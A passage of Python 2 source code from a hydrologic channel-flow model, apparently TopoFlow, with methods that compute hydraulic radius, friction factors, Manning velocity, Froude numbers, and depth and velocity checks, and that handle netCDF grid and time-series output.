    #-------------------------------------------------------------------
    def update_shear_speed(self):

        #--------------------------------------------------------
        # Notes: 9/9/14.  Added so shear speed could be shared.
        #--------------------------------------------------------
        self.u_star[:] = np.sqrt( self.tau / self.rho_H2O )
               
    #   update_shear_speed()
    #-------------------------------------------------------------------
    def update_trapezoid_Rh(self):

        #-------------------------------------------------------------
        # Notes: Compute the hydraulic radius of a trapezoid that:
        #          (1) has a bed width of wb >= 0 (0 for triangular)
        #          (2) has a bank angle of theta (0 for rectangular)
        #          (3) is filled with water to a depth of d.
        #        The units of wb and d are meters.  The units of
        #        theta are assumed to be degrees and are converted.
        #-------------------------------------------------------------
        # NB!    wb should never be zero, so P_wet can never be 0,
        #        which would produce a NaN (divide by zero).
        #-------------------------------------------------------------
        #        See Notes for TF_Tan function in utils_TF.pro
        #            AW = d * (wb + (d * TF_Tan(theta_rad)) )
        #-------------------------------------------------------------
        # 9/9/14.  Bug fix.  Angles were already in radians but
        #          were converted to radians again.
        #--------------------------------------------------------------

        #---------------------------------------------------------
        # Compute hydraulic radius grid for trapezoidal channels
        #-----------------------------------------------------------
        # Note: angles were read as degrees & converted to radians
        #-----------------------------------------------------------
        d     = self.d        # (local synonyms)
        wb    = self.width    # (trapezoid bottom width)
        L2    = d * np.tan( self.angle )          
        A_wet = d * (wb + L2)      
        P_wet = wb + (np.float64(2) * d / np.cos(self.angle) )

        #---------------------------------------------------
        # At noflow_IDs (e.g. edges) P_wet may be zero
        # so do this to avoid "divide by zero". (10/29/11)
        #---------------------------------------------------
        P_wet[ self.d8.noflow_IDs ] = np.float64(1)
        Rh = (A_wet / P_wet)
        #--------------------------------
        # w = np.where(P_wet == 0)
        # print 'In update_trapezoid_Rh():'
        # print '   P_wet= 0 at', w[0].size, 'cells'

        #------------------------------------
        # Force edge pixels to have Rh = 0.
        # This will make u = 0 there also.
        #------------------------------------
        Rh[ self.d8.noflow_IDs ] = np.float64(0)        
##        w  = np.where(wb <= 0)
##        nw = np.size(w[0])
##        if (nw > 0): Rh[w] = np.float64(0)
        
        self.Rh[:]    = Rh
        self.A_wet[:] = A_wet   ## (Now shared: 9/9/14)
        self.P_wet[:] = P_wet   ## (Now shared: 9/9/14)

        #---------------
        # For testing
        #--------------
##        print 'dmin, dmax =', d.min(),  d.max()
##        print 'wmin, wmax =', wb.min(), wb.max()
##        print 'amin, amax =', self.angle.min(), self.angle.max()

    #   update_trapezoid_Rh()
    #-------------------------------------------------------------------
    def update_friction_factor(self):    

        #----------------------------------------    
        # Note:  Added on 9/9/14 to streamline.
        #----------------------------------------------------------
        # Note:  f  = half of the Fanning friction factor
        #        d  = flow depth [m]
        #        z0 = roughness length
        #        S  = bed slope (assumed equal to friction slope)
        #        g  = 9.81 = gravitation constant [m/s^2]
        #---------------------------------------------------------       
        #        For law of the wall:
        #        kappa = 0.41 = von Karman's constant
        #        aval  = 0.48 = integration constant

        #        law_const  = sqrt(g)/kappa = 7.6393d
        #        smoothness = (aval / z0) * d
        #        f = (kappa / alog(smoothness))^2d
        #        tau_bed = rho_w * f * u^2 = rho_w * g * d * S

        #        d, S, and z0 can be arrays.

        #        To make default z0 correspond to default
        #        Manning's n, can use this approximation:
        #        z0 = a * (2.34 * sqrt(9.81) * n / kappa)^6d
        #        For n=0.03, this gives: z0 = 0.011417
        #########################################################
        #        However, for n=0.3, it gives: z0 = 11417.413
        #        which is 11.4 km!  So the approximation only
        #        holds within some range of values.
        #--------------------------------------------------------

        ###############################################################
        # cProfile:  This method took: 0.369 secs for topoflow_test()
        ###############################################################            
        #--------------------------------------
        # Find where (d <= 0).  g=good, b=bad
        #-------------------------------------- 
        wg = self.d_is_pos
        wb = self.d_is_neg
#         wg = ( self.d > 0 )
#         wb = np.invert( wg )
        
        #-----------------------------
        # Compute f for Manning case
        #-----------------------------------------
		# This makes f=0 and du=0 where (d <= 0)
		#-----------------------------------------
        if (self.MANNING):
            n2 = self.nval ** np.float64(2)  
            self.f[ wg ] = self.g * (n2[wg] / (self.d[wg] ** self.one_third))
            self.f[ wb ] = np.float64(0)
 
        #---------------------------------
        # Compute f for Law of Wall case
        #---------------------------------
        if (self.LAW_OF_WALL):
            #------------------------------------------------
            # Make sure (smoothness > 1) before taking log.
            # Should issue a warning if this is used.
            #------------------------------------------------
            smoothness = (self.aval / self.z0val) * self.d
            np.maximum(smoothness, np.float64(1.1), smoothness)  # (in place)
            self.f[wg] = (self.kappa / np.log(smoothness[wg])) ** np.float64(2)
            self.f[wb] = np.float64(0)

        ##############################################################
        # cProfile:  This method took: 0.93 secs for topoflow_test()
        ##############################################################        
#         #--------------------------------------
#         # Find where (d <= 0).  g=good, b=bad
#         #-------------------------------------- 
#         wg = np.where( self.d > 0 )
#         ng = np.size( wg[0])
#         wb = np.where( self.d <= 0 )
#         nb = np.size( wb[0] )
# 
#         #-----------------------------
#         # Compute f for Manning case
#         #-----------------------------------------
# 		  # This makes f=0 and du=0 where (d <= 0)
# 		  #-----------------------------------------
#         if (self.MANNING):
#             n2 = self.nval ** np.float64(2)  
#             if (ng != 0):
#                 self.f[wg] = self.g * (n2[wg] / (self.d[wg] ** self.one_third))
#             if (nb != 0):
#                 self.f[wb] = np.float64(0)
# 
#         #---------------------------------
#         # Compute f for Law of Wall case
#         #---------------------------------
#         if (self.LAW_OF_WALL):
#             #------------------------------------------------
#             # Make sure (smoothness > 1) before taking log.
#             # Should issue a warning if this is used.
#             #------------------------------------------------
#             smoothness = (self.aval / self.z0val) * self.d
#             np.maximum(smoothness, np.float64(1.1), smoothness)  # (in place)
#             ## smoothness = np.maximum(smoothness, np.float64(1.1))
#             if (ng != 0):
#                 self.f[wg] = (self.kappa / np.log(smoothness[wg])) ** np.float64(2)
#             if (nb != 0):
#                 self.f[wb] = np.float64(0)                       

        #---------------------------------------------
        # We could share the Fanning friction factor
        #---------------------------------------------
        ### self.fanning = (np.float64(2) * self.f)

    #   update_friction_factor()       
    #-------------------------------------------------------------------
    def update_velocity(self):

        #---------------------------------------------------------
        # Note: Do nothing now unless this method is overridden
        #       by a particular method of computing velocity.
        #---------------------------------------------------------
        print "Warning: update_velocity() method is inactive."
        
        # print 'KINEMATIC WAVE =', self.KINEMATIC_WAVE
        # print 'DIFFUSIVE WAVE =', self.DIFFUSIVE_WAVE
        # print 'DYNAMIC WAVE   =', self.DYNAMIC_WAVE

    #   update_velocity()
    #-------------------------------------------------------------------
    def update_velocity_on_edges(self):

        #---------------------------------
        # Force edge pixels to have u=0.
        #----------------------------------------
        # Large slope around 1 flows into small
        # slope & leads to a negative velocity.
        #----------------------------------------
        self.u[ self.d8.noflow_IDs ] = np.float64(0)
        
    #   update_velocity_on_edges()
    #-------------------------------------------------------------------
    def update_froude_number(self):

        #----------------------------------------------------------
        # Notes: 9/9/14.  Added so Froude number could be shared.
        # This use of wg & wb reduced cProfile time from:
        # 0.644 sec to: 0.121.  (9/23/14)
        #----------------------------------------------------------
        # g = good, b = bad
        #-------------------- 
        wg = self.d_is_pos
        wb = self.d_is_neg

        self.froude[ wg ] = self.u[wg] / np.sqrt( self.g * self.d[wg] )       
        self.froude[ wb ] = np.float64(0)
               
    #   update_froude_number()
    #-------------------------------------------------------------
    def update_outlet_values(self):
        
        #-------------------------------------------------
        # Save computed values at outlet, which are used
        # by the TopoFlow driver.
        #-----------------------------------------------------
        # Note that Q_outlet, etc. are defined as 0D numpy
        # arrays to make them "mutable scalars" (i.e.
        # this allows changes to be seen by other components
        # who have a reference.  To preserver the reference,
        # however, we must use fill() to assign a new value.
        #-----------------------------------------------------
        Q_outlet = self.Q[ self.outlet_ID ]
        u_outlet = self.u[ self.outlet_ID ]
        d_outlet = self.d[ self.outlet_ID ]
        f_outlet = self.f[ self.outlet_ID ]
    
        self.Q_outlet.fill( Q_outlet )
        self.u_outlet.fill( u_outlet )
        self.d_outlet.fill( d_outlet )
        self.f_outlet.fill( f_outlet )
        
##        self.Q_outlet.fill( self.Q[ self.outlet_ID ] )
##        self.u_outlet.fill( self.u[ self.outlet_ID ] )
##        self.d_outlet.fill( self.d[ self.outlet_ID ] )
##        self.f_outlet.fill( self.f[ self.outlet_ID ] )
        
##        self.Q_outlet = self.Q[ self.outlet_ID ]
##        self.u_outlet = self.u[ self.outlet_ID ]
##        self.d_outlet = self.d[ self.outlet_ID ]
##        self.f_outlet = self.f[ self.outlet_ID ]
        
##        self.Q_outlet = self.Q.flat[self.outlet_ID]
##        self.u_outlet = self.u.flat[self.outlet_ID]
##        self.d_outlet = self.d.flat[self.outlet_ID]
##        self.f_outlet = self.f.flat[self.outlet_ID]
        
    #   update_outlet_values()
    #-------------------------------------------------------------
    def update_peak_values(self):

        if (self.Q_outlet > self.Q_peak):    
            self.Q_peak.fill( self.Q_outlet )
            self.T_peak.fill( self.time_min )      # (time to peak)
        #---------------------------------------
        if (self.u_outlet > self.u_peak):
            self.u_peak.fill( self.u_outlet )
            self.Tu_peak.fill( self.time_min )
        #---------------------------------------
        if (self.d_outlet > self.d_peak):    
            self.d_peak.fill(  self.d_outlet )
            self.Td_peak.fill( self.time_min )
            
##        if (self.Q_outlet > self.Q_peak):    
##            self.Q_peak  = self.Q_outlet
##            self.T_peak  = self.time_min      # (time to peak)
##        #-----------------------------------
##        if (self.u_outlet > self.u_peak):
##            self.u_peak  = self.u_outlet
##            self.Tu_peak = self.time_min
##        #-----------------------------------
##        if (self.d_outlet > self.d_peak):    
##            self.d_peak  = self.d_outlet
##            self.Td_peak = self.time_min

    #   update_peak_values()
    #-------------------------------------------------------------
    def update_Q_out_integral(self):

        #--------------------------------------------------------
        # Note: Renamed "volume_out" to "vol_Q" for consistency
        # with vol_P, vol_SM, vol_IN, vol_ET, etc. (5/18/12)
        #--------------------------------------------------------
        self.vol_Q += (self.Q_outlet * self.dt)  ## Experiment: 5/19/12.
        ## self.vol_Q += (self.Q[self.outlet_ID] * self.dt)
        
    #   update_Q_out_integral()
    #-------------------------------------------------------------
    def update_mins_and_maxes(self, REPORT=False):

        #--------------------------------------
        # Get mins and max over entire domain
        #--------------------------------------
##        Q_min = self.Q.min()
##        Q_max = self.Q.max()
##        #---------------------
##        u_min = self.u.min()
##        u_max = self.u.max()        
##        #---------------------
##        d_min = self.d.min()
##        d_max = self.d.max()
        
        #--------------------------------------------
        # Exclude edges where mins are always zero.
        #--------------------------------------------
        nx = self.nx
        ny = self.ny
        Q_min = self.Q[1:(ny - 2)+1,1:(nx - 2)+1].min()
        Q_max = self.Q[1:(ny - 2)+1,1:(nx - 2)+1].max()
        #-------------------------------------------------
        u_min = self.u[1:(ny - 2)+1,1:(nx - 2)+1].min()
        u_max = self.u[1:(ny - 2)+1,1:(nx - 2)+1].max()        
        #-------------------------------------------------
        d_min = self.d[1:(ny - 2)+1,1:(nx - 2)+1].min()
        d_max = self.d[1:(ny - 2)+1,1:(nx - 2)+1].max()

        #-------------------------------------------------
        # (2/6/13) This preserves "mutable scalars" that
        # can be accessed as refs by other components.
        #-------------------------------------------------
        if (Q_min < self.Q_min):
            self.Q_min.fill( Q_min )
        if (Q_max > self.Q_max):
            self.Q_max.fill( Q_max )
        #------------------------------
        if (u_min < self.u_min):
            self.u_min.fill( u_min )
        if (u_max > self.u_max):
            self.u_max.fill( u_max )
        #------------------------------
        if (d_min < self.d_min):
            self.d_min.fill( d_min )
        if (d_max > self.d_max):
            self.d_max.fill( d_max )
        
        #-------------------------------------------------
        # (2/6/13) This preserves "mutable scalars" that
        # can be accessed as refs by other components.
        #-------------------------------------------------        
##        self.Q_min.fill( np.minimum( self.Q_min, Q_min ) )
##        self.Q_max.fill( np.maximum( self.Q_max, Q_max ) )
##        #---------------------------------------------------
##        self.u_min.fill( np.minimum( self.u_min, u_min ) )
##        self.u_max.fill( np.maximum( self.u_max, u_max ) )
##        #---------------------------------------------------
##        self.d_min.fill( np.minimum( self.d_min, d_min ) )
##        self.d_max.fill( np.maximum( self.d_max, d_max ) )

        #-------------------------------------------------
        # (2/6/13) This preserves "mutable scalars" that
        # can be accessed as refs by other components.
        #-------------------------------------------------        
##        self.Q_min.fill( min( self.Q_min, Q_min ) )
##        self.Q_max.fill( max( self.Q_max, Q_max ) )
##        #---------------------------------------------------
##        self.u_min.fill( min( self.u_min, u_min ) )
##        self.u_max.fill( max( self.u_max, u_max ) )
##        #---------------------------------------------------
##        self.d_min.fill( min( self.d_min, d_min ) )
##        self.d_max.fill( max( self.d_max, d_max ) )
        
        #----------------------------------------------
        # (2/6/13) This produces "immutable scalars".
        #----------------------------------------------
##        self.Q_min = self.Q.min()
##        self.Q_max = self.Q.max()
##        self.u_min = self.u.min()
##        self.u_max = self.u.max()
##        self.d_min = self.d.min()
##        self.d_max = self.d.max()

        if (REPORT):
            print 'In channels_base.update_mins_and_maxes():'
            print '(dmin, dmax) =', self.d_min, self.d_max
            print '(umin, umax) =', self.u_min, self.u_max
            print '(Qmin, Qmax) =', self.Q_min, self.Q_max
            print ' '
            
    #   update_mins_and_maxes()
    #-------------------------------------------------------------------
    def check_flow_depth(self):

        OK = True
        d  = self.d
        dt = self.dt
        nx = self.nx   #################
        
        #---------------------------------
        # All all flow depths positive ?
        #---------------------------------
        wbad = np.where( np.logical_or( d < 0.0, np.logical_not(np.isfinite(d)) ))
        nbad = np.size( wbad[0] )       
        if (nbad == 0):    
            return OK

        OK = False
        dmin = d[wbad].min()
        star_line = '*******************************************'
        
        msg = [ star_line, \
               'ERROR: Simulation aborted.', ' ', \
               'Negative depth found: ' + str(dmin), \
               'Time step may be too large.', \
               'Time step:      ' + str(dt) + ' [s]', ' ']
        for k in xrange(len(msg)):
            print msg[k]
        
        #-------------------------------------------
        # If not too many, print actual velocities
        #-------------------------------------------
        if (nbad < 30):          
            brow = wbad[0][0]
            bcol = wbad[1][0]
##            badi = wbad[0]
##            bcol = (badi % nx)
##            brow = (badi / nx)
            crstr = str(bcol) + ', ' + str(brow)

            msg = ['(Column, Row):  ' + crstr, \
                   'Flow depth:     ' + str(d[brow, bcol])]
            for k in xrange(len(msg)):
                print msg[k]

        print star_line 
        print ' '
        return OK

    #   check_flow_depth
    #-------------------------------------------------------------------
    def check_flow_velocity(self):

        OK = True
        u  = self.u
        dt = self.dt
        nx = self.nx
        
        #--------------------------------
        # Are all velocities positive ?
        #--------------------------------
        wbad = np.where( np.logical_or( u < 0.0, np.logical_not(np.isfinite(u)) ))
        nbad = np.size( wbad[0] )
        if (nbad == 0):    
            return OK

        OK = False
        umin = u[wbad].min()
        star_line = '*******************************************'
        msg = [ star_line, \
               'ERROR: Simulation aborted.', ' ', \
               'Negative or NaN velocity found: ' + str(umin), \
               'Time step may be too large.', \
               'Time step:      ' + str(dt) + ' [s]', ' ']
        for k in xrange(len(msg)):
            print msg[k]

        #-------------------------------------------
        # If not too many, print actual velocities
        #-------------------------------------------
        if (nbad < 30):
            brow = wbad[0][0]
            bcol = wbad[1][0]
##            badi = wbad[0]
##            bcol = (badi % nx)
##            brow = (badi / nx)
            crstr = str(bcol) + ', ' + str(brow)

            msg = ['(Column, Row):  ' + crstr, \
                   'Velocity:       ' + str(u[brow, bcol])]
            for k in xrange(len(msg)):
                print msg[k]

        print star_line
        print ' '
        return OK

            
##        umin = u[wbad].min()
##        badi = wbad[0]
##        bcol = (badi % nx)
##        brow = (badi / nx)
##        crstr = str(bcol) + ', ' + str(brow)
##        msg = np.array([' ', \
##                     '*******************************************', \
##                     'ERROR: Simulation aborted.', ' ', \
##                     'Negative velocity found: ' + str(umin), \
##                     'Time step may be too large.', ' ', \
##                     '(Column, Row):  ' + crstr, \
##                     'Velocity:       ' + str(u[badi]), \
##                     'Time step:      ' + str(dt) + ' [s]', \
##                     '*******************************************', ' '])
##        for k in xrange( np.size(msg) ):
##            print msg[k]

##        return OK                          


    #   check_flow_velocity
    #-------------------------------------------------------------------  
    def open_input_files(self):

        # This doesn't work, because file_unit doesn't get full path. (10/28/11)
        # start_dir = os.getcwd()
        # os.chdir( self.in_directory )

        # print '### start_dir =', start_dir
        # print '### in_directory =', self.in_directory

        in_files = ['slope_file', 'nval_file', 'z0val_file',
                    'width_file', 'angle_file', 'sinu_file', 'd0_file']
        self.prepend_directory( in_files, INPUT=True )

        # self.slope_file = self.in_directory + self.slope_file
        # self.nval_file  = self.in_directory + self.nval_file
        # self.z0val_file = self.in_directory + self.z0val_file
        # self.width_file = self.in_directory + self.width_file
        # self.angle_file = self.in_directory + self.angle_file
        # self.sinu_file  = self.in_directory + self.sinu_file
        # self.d0_file    = self.in_directory + self.d0_file

        #self.code_unit = model_input.open_file(self.code_type,  self.code_file)
        self.slope_unit = model_input.open_file(self.slope_type, self.slope_file)
        if (self.MANNING):
            self.nval_unit  = model_input.open_file(self.nval_type,  self.nval_file)
        if (self.LAW_OF_WALL):
            self.z0val_unit = model_input.open_file(self.z0val_type, self.z0val_file)
        self.width_unit = model_input.open_file(self.width_type, self.width_file)
        self.angle_unit = model_input.open_file(self.angle_type, self.angle_file)
        self.sinu_unit  = model_input.open_file(self.sinu_type,  self.sinu_file)
        self.d0_unit    = model_input.open_file(self.d0_type,    self.d0_file)

        # os.chdir( start_dir )

    #   open_input_files()        
    #-------------------------------------------------------------------  
    def read_input_files(self):

        #---------------------------------------------------
        # The flow codes are always a grid, size of DEM.
        #---------------------------------------------------
        # NB! model_input.py also has a read_grid() function.
        #---------------------------------------------------        
        rti = self.rti
##        print 'Reading D8 flow grid (in CHANNELS)...'
##        self.code = rtg_files.read_grid(self.code_file, rti,
##                                        RTG_type='BYTE')
##        print ' '
        
        #-------------------------------------------------------
        # All grids are assumed to have a data type of Float32.
        #-------------------------------------------------------
        slope = model_input.read_next(self.slope_unit, self.slope_type, rti)
        if (slope != None): self.slope = slope
        
        # If EOF was reached, hopefully numpy's "fromfile"
        # returns None, so that the stored value will be
        # the last value that was read.

        if (self.MANNING):
            nval = model_input.read_next(self.nval_unit, self.nval_type, rti)
            if (nval != None):
                self.nval     = nval
                self.nval_min = nval.min()
                self.nval_max = nval.max()
                
        if (self.LAW_OF_WALL):
            z0val = model_input.read_next(self.z0val_unit, self.z0val_type, rti)
            if (z0val != None):
                self.z0val     = z0val
                self.z0val_min = z0val.min()
                self.z0val_max = z0val.max()
        
        width = model_input.read_next(self.width_unit, self.width_type, rti)
        if (width != None): self.width = width
        
        angle = model_input.read_next(self.angle_unit, self.angle_type, rti)
        if (angle != None):
            #-----------------------------------------------
            # Convert bank angles from degrees to radians. 
            #-----------------------------------------------
            self.angle = angle * self.deg_to_rad  # [radians]
            ### self.angle = angle  # (before 9/9/14)

        sinu = model_input.read_next(self.sinu_unit, self.sinu_type, rti)
        if (sinu != None): self.sinu = sinu
        
        d0 = model_input.read_next(self.d0_unit, self.d0_type, rti)
        if (d0 != None): self.d0 = d0

        ## code = model_input.read_grid(self.code_unit, \
        ##                            self.code_type, rti, dtype='UInt8')
        ## if (code != None): self.code = code

    #   read_input_files()     
    #-------------------------------------------------------------------  
    def close_input_files(self):

        # if not(self.slope_unit.closed):
        # if (self.slope_unit != None):

        #-------------------------------------------------
        # NB!  self.code_unit was never defined as read.
        #-------------------------------------------------
        # if (self.code_type != 'scalar'): self.code_unit.close()

        if (self.slope_type != 'Scalar'): self.slope_unit.close()
        if (self.MANNING):
            if (self.nval_type != 'Scalar'): self.nval_unit.close()
        if (self.LAW_OF_WALL):
           if (self.z0val_type != 'Scalar'): self.z0val_unit.close()
        if (self.width_type != 'Scalar'): self.width_unit.close()
        if (self.angle_type != 'Scalar'): self.angle_unit.close()
        if (self.sinu_type  != 'Scalar'): self.sinu_unit.close()
        if (self.d0_type    != 'Scalar'): self.d0_unit.close()
    
##        if (self.slope_file != ''): self.slope_unit.close()
##        if (self.MANNING):
##            if (self.nval_file  != ''): self.nval_unit.close()
##        if (self.LAW_OF_WALL):
##           if (self.z0val_file != ''): self.z0val_unit.close()
##        if (self.width_file != ''): self.width_unit.close()
##        if (self.angle_file != ''): self.angle_unit.close()
##        if (self.sinu_file  != ''): self.sinu_unit.close()
##        if (self.d0_file    != ''): self.d0_unit.close()

    #   close_input_files()       
    #-------------------------------------------------------------------  
    def update_outfile_names(self):

        #-------------------------------------------------
        # Notes:  Append out_directory to outfile names.
        #-------------------------------------------------
        self.Q_gs_file = (self.out_directory + self.Q_gs_file)
        self.u_gs_file = (self.out_directory + self.u_gs_file)
        self.d_gs_file = (self.out_directory + self.d_gs_file) 
        self.f_gs_file = (self.out_directory + self.f_gs_file) 
        #--------------------------------------------------------
        self.Q_ts_file = (self.out_directory + self.Q_ts_file)
        self.u_ts_file = (self.out_directory + self.u_ts_file) 
        self.d_ts_file = (self.out_directory + self.d_ts_file) 
        self.f_ts_file = (self.out_directory + self.f_ts_file) 

    #   update_outfile_names()
    #-------------------------------------------------------------------  
    def bundle_output_files(self):    

        ###################################################
        # NOT READY YET. Need "get_long_name()" and a new
        # version of "get_var_units".  (9/21/14)
        ###################################################
                
        #-------------------------------------------------------------       
        # Bundle the output file info into an array for convenience.
        # Then we just need one open_output_files(), in BMI_base.py,
        # and one close_output_files().  Less to maintain. (9/21/14)
        #-------------------------------------------------------------        
        # gs = grid stack, ts = time series, ps = profile series.
        #-------------------------------------------------------------
        self.out_files = [
        {var_name:'Q', 
        save_gs:self.SAVE_Q_GRIDS,  gs_file:self.Q_gs_file,
        save_ts:self.SAVE_Q_PIXELS, ts_file:self.Q_ts_file, 
        long_name:get_long_name('Q'), units_name:get_var_units('Q')}, 
        #-----------------------------------------------------------------
        {var_name:'u',
        save_gs:self.SAVE_U_GRIDS,  gs_file:self.u_gs_file,
        save_ts:self.SAVE_U_PIXELS, ts_file:self.u_ts_file,
        long_name:get_long_name('u'), units_name:get_var_units('u')},
        #-----------------------------------------------------------------
        {var_name:'d',
        save_gs:self.SAVE_D_GRIDS,  gs_file:self.d_gs_file,
        save_ts:self.SAVE_D_PIXELS, ts_file:self.d_ts_file,
        long_name:get_long_name('d'), units_name:get_var_units('d')}, 
        #-----------------------------------------------------------------
        {var_name:'f',
        save_gs:self.SAVE_F_GRIDS,  gs_file:self.f_gs_file,
        save_ts:self.SAVE_F_PIXELS, ts_file:self.f_ts_file,
        long_name:get_long_name('f'), units_name:get_var_units('f')} ]
                        
    #   bundle_output_files
    #-------------------------------------------------------------------  
    def open_output_files(self):

        model_output.check_netcdf()
        self.update_outfile_names()
        ## self.bundle_output_files()
        

##        print 'self.SAVE_Q_GRIDS =', self.SAVE_Q_GRIDS
##        print 'self.SAVE_U_GRIDS =', self.SAVE_U_GRIDS
##        print 'self.SAVE_D_GRIDS =', self.SAVE_D_GRIDS
##        print 'self.SAVE_F_GRIDS =', self.SAVE_F_GRIDS
##        #---------------------------------------------------
##        print 'self.SAVE_Q_PIXELS =', self.SAVE_Q_PIXELS
##        print 'self.SAVE_U_PIXELS =', self.SAVE_U_PIXELS
##        print 'self.SAVE_D_PIXELS =', self.SAVE_D_PIXELS
##        print 'self.SAVE_F_PIXELS =', self.SAVE_F_PIXELS

#         IDs = self.outlet_IDs
#         for k in xrange( len(self.out_files) ):
# 			#--------------------------------------
# 			# Open new files to write grid stacks
# 			#--------------------------------------
#             if (self.out_files[k].save_gs):
#                 model_output.open_new_gs_file( self, self.out_files[k], self.rti )
# 			#--------------------------------------
# 			# Open new files to write time series
# 			#--------------------------------------
#             if (self.out_files[k].save_ts):
#                 model_output.open_new_ts_file( self, self.out_files[k], IDs )
                                                          
        #--------------------------------------
        # Open new files to write grid stacks
        #--------------------------------------
        if (self.SAVE_Q_GRIDS):   
            model_output.open_new_gs_file( self, self.Q_gs_file, self.rti,
                                           var_name='Q',
                                           long_name='volumetric_discharge',
                                           units_name='m^3/s')
            
        if (self.SAVE_U_GRIDS):    
            model_output.open_new_gs_file( self, self.u_gs_file, self.rti,
                                           var_name='u',
                                           long_name='mean_channel_flow_velocity',
                                           units_name='m/s')
        
        if (self.SAVE_D_GRIDS):    
            model_output.open_new_gs_file( self, self.d_gs_file, self.rti,
                                           var_name='d',
                                           long_name='max_channel_flow_depth',
                                           units_name='m')

        if (self.SAVE_F_GRIDS):    
            model_output.open_new_gs_file( self, self.f_gs_file, self.rti,
                                           var_name='f',
                                           long_name='friction_factor',
                                           units_name='none')
            
        #--------------------------------------
        # Open new files to write time series
        #--------------------------------------
        IDs = self.outlet_IDs
        if (self.SAVE_Q_PIXELS):  
            model_output.open_new_ts_file( self, self.Q_ts_file, IDs,
                                           var_name='Q',
                                           long_name='volumetric_discharge',
                                           units_name='m^3/s')
                                          
        if (self.SAVE_U_PIXELS):
            model_output.open_new_ts_file( self, self.u_ts_file, IDs,
                                           var_name='u',
                                           long_name='mean_channel_flow_velocity',
                                           units_name='m/s')
                                          
        if (self.SAVE_D_PIXELS):    
            model_output.open_new_ts_file( self, self.d_ts_file, IDs,
                                           var_name='d',
                                           long_name='max_channel_flow_depth',
                                           units_name='m')
            
        if (self.SAVE_F_PIXELS):    
            model_output.open_new_ts_file( self, self.f_ts_file, IDs,
                                           var_name='f',
                                           long_name='friction_factor',
                                           units_name='none')
        
    #   open_output_files()
    #-------------------------------------------------------------------  
    def write_output_files(self, time_seconds=None):

        #---------------------------------------------------------
        # Notes:  This function was written to use only model
        #         time (maybe from a caller) in seconds, and
        #         the save_grid_dt and save_pixels_dt parameters
        #         read by read_cfg_file().
        #
        #         read_cfg_file() makes sure that all of
        #         the "save_dts" are larger than or equal to the
        #         process dt.
        #---------------------------------------------------------
        
        #-----------------------------------------
        # Allows time to be passed from a caller
        #-----------------------------------------
        if (time_seconds is None):
            time_seconds = self.time_sec
        model_time = int(time_seconds)
        
        #----------------------------------------
        # Save computed values at sampled times
        #----------------------------------------
        if (model_time % int(self.save_grid_dt) == 0):
            self.save_grids()
        if (model_time % int(self.save_pixels_dt) == 0):
            self.save_pixel_values()

        #----------------------------------------
        # Save computed values at sampled times
        #----------------------------------------
##        if ((self.time_index % self.grid_save_step) == 0):
##             self.save_grids()
##        if ((self.time_index % self.pixel_save_step) == 0):
##             self.save_pixel_values()
        
    #   write_output_files()
    #-------------------------------------------------------------------  
    def close_output_files(self):

        if (self.SAVE_Q_GRIDS):  model_output.close_gs_file( self, 'Q')   
        if (self.SAVE_U_GRIDS):  model_output.close_gs_file( self, 'u')  
        if (self.SAVE_D_GRIDS):  model_output.close_gs_file( self, 'd')   
        if (self.SAVE_F_GRIDS):  model_output.close_gs_file( self, 'f')
        #---------------------------------------------------------------
        if (self.SAVE_Q_PIXELS): model_output.close_ts_file( self, 'Q')   
        if (self.SAVE_U_PIXELS): model_output.close_ts_file( self, 'u')    
        if (self.SAVE_D_PIXELS): model_output.close_ts_file( self, 'd')    
        if (self.SAVE_F_PIXELS): model_output.close_ts_file( self, 'f')
        
    #   close_output_files()              
    #-------------------------------------------------------------------  
    def save_grids(self):
        
        #-----------------------------------
        # Save grid stack to a netCDF file
        #---------------------------------------------
        # Note that add_grid() methods will convert
        # var from scalar to grid now, if necessary.
        #---------------------------------------------        
        if (self.SAVE_Q_GRIDS):
            model_output.add_grid( self, self.Q, 'Q', self.time_min )
            
        if (self.SAVE_U_GRIDS):
            model_output.add_grid( self, self.u, 'u', self.time_min )
            
        if (self.SAVE_D_GRIDS):
            model_output.add_grid( self, self.d, 'd', self.time_min )

        if (self.SAVE_F_GRIDS):
            model_output.add_grid( self, self.f, 'f', self.time_min )     

    #   save_grids()
    #-------------------------------------------------------------------  
    def save_pixel_values(self):   ##### save_time_series_data(self)  #######
        
        IDs  = self.outlet_IDs
        time = self.time_min       #####

        #-------------
        # New method
        #-------------
        if (self.SAVE_Q_PIXELS):
            model_output.add_values_at_IDs( self, time, self.Q, 'Q', IDs )
                    
        if (self.SAVE_U_PIXELS):
            model_output.add_values_at_IDs( self, time, self.u, 'u', IDs )
            
        if (self.SAVE_D_PIXELS):
            model_output.add_values_at_IDs( self, time, self.d, 'd', IDs )
            
        if (self.SAVE_F_PIXELS):
            model_output.add_values_at_IDs( self, time, self.f, 'f', IDs )
        
    #   save_pixel_values()
    #-------------------------------------------------------------------
    def manning_formula(self):

        #---------------------------------------------------------
        # Notes: R = (A/P) = hydraulic radius [m]
        #        N = Manning's roughness coefficient
        #            (usually in the range 0.012 to 0.035)
        #        S = bed slope or free slope

        #        R,S, and N may be 2D arrays.

        #        If length units are all *feet*, then an extra
        #        factor of 1.49 must be applied.  If units are
        #        meters, no such factor is needed.

        #        Note that Q = Ac * u, where Ac is cross-section
        #        area.  For a trapezoid, Ac does not equal w*d.
        #---------------------------------------------------------
        if (self.KINEMATIC_WAVE):
            S = self.S_bed
        else:
        	S = self.S_free

        u = (self.Rh ** self.two_thirds) * np.sqrt(S) / self.nval
        
        #--------------------------------------------------------
        # Add a hydraulic jump option for when u gets too big ?
        #--------------------------------------------------------
          
        return u
    
    #   manning_formula()
    #-------------------------------------------------------------------
    def law_of_the_wall(self):

        #---------------------------------------------------------
        # Notes: u  = flow velocity  [m/s]
        #        d  = flow depth [m]
        #        z0 = roughness length
        #        S  = bed slope or free slope

        #        g     = 9.81 = gravitation constant [m/s^2]
        #        kappa = 0.41 = von Karman's constant
        #        aval  = 0.48 = integration constant

        #        law_const  = sqrt(g)/kappa = 7.6393d
        #        smoothness = (aval / z0) * d
        #        f = (kappa / alog(smoothness))^2d
        #        tau_bed = rho_w * f * u^2 = rho_w * g * d * S

        #        d, S, and z0 can be arrays.

        #        To make default z0 correspond to default
        #        Manning's n, can use this approximation:
        #        z0 = a * (2.34 * sqrt(9.81) * n / kappa)^6d
        #        For n=0.03, this gives: z0 = 0.011417
        #########################################################
        #        However, for n=0.3, it gives: z0 = 11417.413
        #        which is 11.4 km!  So the approximation only
        #        holds within some range of values.
        #--------------------------------------------------------
        if (self.KINEMATIC_WAVE):
            S = self.S_bed
        else:
        	S = self.S_free

